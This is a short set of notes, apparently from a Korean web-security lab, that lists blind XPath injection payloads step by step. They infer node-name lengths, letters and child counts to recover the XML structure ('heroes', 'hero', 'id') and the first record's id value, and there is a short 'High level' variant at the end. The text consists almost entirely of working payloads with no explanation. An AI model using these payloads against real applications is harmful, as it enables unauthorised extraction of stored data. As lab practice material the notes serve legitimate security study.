 5) XML/XPath 인젝션

 ① 

' or string-length(name(parent::*)) = 1 or '
' or string-length(name(parent::*)) = 2 or '
' or string-length(name(parent::*)) = 3 or '
' or string-length(name(parent::*)) = 4 or '
' or string-length(name(parent::*)) = 5 or '
' or string-length(name(parent::*)) = 6 or '


 ② 

' or substring(name(parent::*), 1,1) = 'h' or '
' or substring(name(parent::*), 2,1) = 'e' or '
' or substring(name(parent::*), 3,1) = 'r' or '
' or substring(name(parent::*), 4,1) = 'o' or '
' or substring(name(parent::*), 5,1) = 'e' or '
' or substring(name(parent::*), 6,1) = 's' or '
' or name(parent::*) = 'heroes' or '


 ③ 

' or count(../child::*) = 1 or '
' or count(../child::*) = 2 or '
' or count(../child::*) = 3 or '
' or count(../child::*) = 4 or '
' or count(../child::*) = 5 or '
' or count(../child::*) = 6 or '


 ④ 

' or string-length(name(../child::*[position()=1])) = 1 or '
' or string-length(name(../child::*[position()=1])) = 2 or '
' or string-length(name(../child::*[position()=1])) = 3 or '
' or string-length(name(../child::*[position()=1])) = 4 or '


 ⑤ 

' or substring(name(../child::*[position()=1]),1,1) = 'h' or '
' or substring(name(../child::*[position()=1]),2,1) = 'e' or '
' or substring(name(../child::*[position()=1]),3,1) = 'r' or '
' or substring(name(../child::*[position()=1]),4,1) = 'o' or '
' or name(../child::*[position()=1]) = 'hero' or '


 ⑥ 

' or count(/heroes/hero[1]/child::*) = 1 or '
' or count(/heroes/hero[1]/child::*) = 2 or '
' or count(/heroes/hero[1]/child::*) = 3 or '
' or count(/heroes/hero[1]/child::*) = 4 or '
' or count(/heroes/hero[1]/child::*) = 5 or '
' or count(/heroes/hero[1]/child::*) = 6 or '


 ⑦ 

' or string-length(name(/heroes/hero[1]/child::*[position()=1])) = 1 or '
' or string-length(name(/heroes/hero[1]/child::*[position()=1])) = 2 or '


 ⑧ 

' or substring(name(/heroes/hero[1]/child::*[position()=1]),1,1) = 'i' or '
' or substring(name(/heroes/hero[1]/child::*[position()=1]),2,1) = 'd' or '
' or name(/heroes/hero[1]/child::*[position()=1]) = 'id' or '


 ⑨ 

' or string-length(string(//hero[1]/id)) = 1 or '


 ⑩ 

' or substring((//hero[1]/id),1,1) = '1' or '        
' or string(//hero[1]/id) = '1' or '               
        


 6) High 레벨

' or name(parent::*) = 'heroes' or '
